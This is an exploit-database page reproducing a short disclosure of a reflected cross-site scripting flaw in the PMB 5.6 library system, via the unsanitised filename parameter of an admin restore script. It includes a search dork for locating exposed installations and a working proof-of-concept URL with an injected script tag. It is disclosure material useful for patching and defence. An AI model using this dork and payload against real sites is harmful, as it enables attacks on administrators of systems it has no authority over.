Exploit for PMB 5.6 Cross Site Scripting

Name: Exploit for PMB 5.6 Cross Site Scripting
Rating: 5 (576 reviews)

2020-07-17 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:158462
# Exploit Title: PMB 5.6 Cross Site Scripting XSS  
# Google Dork: inurl:opac_css  
# Date: 20-04-2020  
# Exploit Author: 41-trk (Tarik Bakir)  
# Email: tarikbak999[at]gmail.com  
# Vendor Homepage: http://www.sigb.net  
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files  
# Affected versions : <= 5.6   
  
-==== Vulnerability ====-  
  
  
Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.  
  
  
-==== POC ====-  
  
http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1  
  
================================